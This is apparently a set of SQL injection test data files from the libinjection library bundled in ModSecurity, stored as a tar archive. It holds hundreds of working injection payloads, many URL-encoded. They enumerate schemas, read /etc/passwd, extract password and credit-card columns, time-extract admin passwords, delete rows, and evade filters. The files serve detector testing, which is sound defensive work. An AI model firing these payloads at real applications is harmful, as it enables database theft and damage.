union all select 2 -- -1 - (select 1) - union all select 2 -- (select 1) - 1 union all select 2 -- ((select 1) - 1) + (select 1) union all select 2 -- (select (select (select 1))) union all select 2 -- (select (select (select 1))) union all select 2 -- (select ((select (select 1))) union all select 2 -- (select (select ((select 1))) union all select 2 -- (select ((select 1 - (select 1))) union all select 2 -- (select (select (((select 1))) union all select 2 -- (select ((select (select 1))) union all select 2 -- (select (((select (select 1))) union all select 2 -- (select (select (1 - select 1))) union all select 2 -- (select (select 1 - (select 1))) union all select 2 -- (select 1 - (select 1 - (select 1))) union all select 2 -- # moar unions -1 union distinct select table_name from information_schema.tables -1 union distinct all select table_name from information_schema.tables -1 union all distinct select table_name from information_schema.tables -1 union all select table_name from information_schema.tables # more if(1, -1, 2) union select table_name from information_schema.tables limit 1 if((1), -1, 2) union select table_name from information_schema.tables limit 1 if(1=2, -1, 2) union select table_name from information_schema.tables limit 1 true in(2, (select 2)) union select table_name from information_schema.tables limit 1 true in(2, 1) union select table_name from information_schema.tables limit 1 # -1 union select current_user``union select table_name from information_schema.tables if(1, 1, 2) union select 3 if(sin(1), 1, 2) union select 3 if(1, sin(1), 2) union select 3 if(1 - sin(1), 2) union select 3 if((1), 1, 2) union select 3 if(-(1), 1, 2) union select 3 # 1; if exists ( /* anything */ # these aren't SQL but close enough union (select 1)-- union all (select 1)-- union all (select distinct 1)-- union (select 1,2,3,4,5)-- union (select -1,2,3,4,5)-- union (select -(1),2,3,4,5)-- union (select -sin(1),2,3,4,5)-- 1;call p(@version, @a) 1;load data infile "foo" 1;load xml infile "foo" 1;load xml local infile "foo" 1;load xml low_priority infile "foo" 1;load xml concurrent infile "foo" 1; delete from foo 1; delete low_priority from foo 1; delete quick from foo 1; delete ignore from foo 1;do (1=1) -0b01 for update union select table_name from information_schema.tables limit 1 binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables 12 union select table_name from information_schema.tables limit 1 binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1 binary (false) union select table_name from information_schema.tables limit 1 1 - binary (false) union select table_name from information_schema.tables limit 1 1 - (binary (false)) union select table_name from information_schema.tables limit 1 binary binary 1 union select table_name from information_schema.tables binary -1 union select table_name from information_schema.tables binary -(1) union select table_name from information_schema.tables binary (binary 1) union select table_name from information_schema.tables binary (binary 1) union select table_name from information_schema.tables # werid slash escaping in Older T-SQL databases # http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR \1=\1AND\1=\1; # more weird T-SQL weirdness \%250=\-1AND\*1=\/1 # mysql -1 procedure analyse() union select table_name from information_schema.tables limit 1 # HT @FluxReiners (1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- - @a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- - # HT @LightOS # issue here is how '1gfsdg..' is processed. # MySQL parses it as a single word, other databases treat it as "1", "gfs..." -1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1 # HT @FluxReiners (select 1 foo) union select load_file('foo'); # # Anonymous from Research Institution of Telecom in Beijing, China # commenting out since i have no idea how this could be a true SQL injection #=1 union select admin,pass from admin limit 1 #=1 union select 1,2,3,4,5,6 # problems with type-casting, and nested type casting # # credit: Reto Ischi # 's' || binary(1)# and n='foo" 1 - binary (1 - binary(1)) UNION SELECT 2 -- 1 - binary (binary(1) -1) UNION SELECT 2 -- binary (1 - binary(1)) UNION SELECT 2 -- binary (binary(1) - 1) UNION SELECT 2 -- binary (binary(1)) UNION SELECT 2 -- # # Padding using between operator # (1 between @version and "2") & 1 UNION SELECT 1 (1 between @version and @user) & 1 UNION SELECT 1 (1 between 1 and @version) & 1 UNION SELECT 1 (1 between '1' and @version) & 1 UNION SELECT 1 (1 between 1 and 2) & 1 UNION SELECT 1 (1 between '1' and '2') & 1 UNION SELECT 1 (1 between 1 and '2') & 1 UNION SELECT 1 (1 between '1' and 2) & 1 UNION SELECT 1 ('1' between '1' and '2') & 1 UNION SELECT 1 (@version between '1' and '2') & 1 UNION SELECT 1 (@version between 1 and '2') & 1 UNION SELECT 1 # # ANY and SOME subqueries # 1 - ANY(SELECT 1,2) ANY(SELECT 1) - 1 UNION ALL -- ANY(SELECT (1)) - 1 UNION ALL -- ANY((SELECT 1)) - 1 UNION ALL -- 1 - ANY(SELECT 1) UNION ALL -- # # embedded %A0 mysql # 1%A0UNION%A0SELECT%A02-- 1%00UNION%00SELECT%002-- # # http://www.exploit-db.com/exploits/28854/ # stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1 # # Thanks to @rsalgado # A degenerate MySQL ODBC case # -{``.``.id} union select table_name FROM information_schema.tables LIMIT 1 modsecurity-v3.0.4/others/libinjection/data/sqli-left.txt0000644000175000017500000000030113607066311024031 0ustar zimmerlezimmerle# # Yong Deng reported 2016-10-20 # # Tests that "left" is treated as a function # # http://www.w3resource.com/mysql/string-functions/mysql-left-function.php 1'and left(database(),2)>'sa'--+ modsecurity-v3.0.4/others/libinjection/data/sqli-isc_sans.txt0000644000175000017500000000067113607066311024713 0ustar zimmerlezimmerle# http://isc.sans.edu/diary.html?storyid=12127 189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version------snip---- 189%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version--------snip---- 189%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29%29------snip---- 189%27%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version%29------snip---- # http://isc.sans.edu/diary.html?storyid=11011 999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536-- modsecurity-v3.0.4/others/libinjection/data/sqli-insert_attacks.txt0000644000175000017500000000252213607066311026124 0ustar zimmerlezimmerle# solar empire attack # http://www.exploit-db.com/exploits/4078/ # these use the multiple insert syntax # INSERT INTO FOO VALUES (1, 'foo'), (2, 'bar) .... # $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')" # $sql = "INSERT INTO FOO VALUES (1, '$DIRTY')" # $sql = "INSERT INTO FOO VALUES ('$DIRTY', 2)" F%2A%2A%2A%2A%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A # numeric version 999%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A # arg switch F%2A%2A%2A%2A%27%2C+2%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A # arg switch + numeric 999%2C+%27CRAP%27%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C+0%29+FROM+se_games%29%29%2F%2A 999%2C+1%29%2C%281%2C2%2C3%2C4%2C5%2C%28SELECT+IF+%28%28ASCII%28SUBSTRING%28se_games.admin_pw%2C1%2C1%29%3D%271%27%29+%26+1%2C+benchmark%2820000%2CCHAR%280%29%29%2C0%29+FROM+se_games%29%29%2F%2A modsecurity-v3.0.4/others/libinjection/data/sqli-ibm.txt0000644000175000017500000000036013607066311023653 0ustar zimmerlezimmerle# various things for http://www-01.ibm.com/support/knowledgecenter/SSGU8G_11.50.0/com.ibm.sqls.doc/ids_sqs_1526.htm # UNION ALL SELECT FileToClob("/etc/passwd", "server")::html,0 UNION ALL SELECT FileToBlob("/etc/passwd", "server")::html,0 modsecurity-v3.0.4/others/libinjection/data/sqli-hackers.txt0000644000175000017500000006634013607066311024536 0ustar zimmerlezimmerle1%20AND%20%28select%20DCount%28last%28username%29 1%29%20from%20users%20where%20username%3D%27ad1min%27%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20substr%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29 %28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29 %28select%20login/2%20from%20users%20limit%201%2C1%29 %28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29 union%20%28select%20id%20from%20users%20limit%201%2C1%29 0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -0union%20%28select%20id%20from%20users%20limit%201%2C1%29 -union%20%28select%20id%20from%20users%20limit%201%2C1%29 -.1union%20%28select%20id%20from%20users%20limit%201%2C1%29 -.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 %28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29 %28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29 %28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29 %28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29 %28select%20substr%0D%0A%28login%0D%0A%2C %28select%20substr%28login%0D%0A%29 %28select%20substr%28login%29 %28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29 ##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 /%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29 -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x -999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x %27%20or%201%3D1%20or%20%27 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29 xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29 oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29 %28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29 xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 %27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29 -1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20union -1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29 -1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29 -1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29 -1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29 -1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29 -1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29 -1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29 -1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29 -1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29 -1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 %27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1 %27union%20select%20us3rs%20from%20table1 %27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1 %27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1 %27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1 %27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1 %27-%40%D1%841%20union%20select%20us3rs%20from%20table1 %27-%40a1%20union%20select%20us3rs%20from%20table1 %27-%40%D1%841%20union%20select%20us3rs%20from%20table1 %27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1 %27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1 %27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1 %27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1 %27-%40%D1%841%20union%20select%20us3rs%20from%20table1 %27-%401%20union%20select%20us3rs%20from%20table1 %27-%401%20union%20select%20us3rs%20from%20table1 %27-%40%D1%841%20union%20select%20us3rs%20from%20table1 -1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29 %27-%40%D1%841%20union%20select%20us3rs%20from%20table1 -1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29 -1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29 -1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 %27-%40a1%20union%20select%20us3rs%20from%20table1 -1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 -1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29 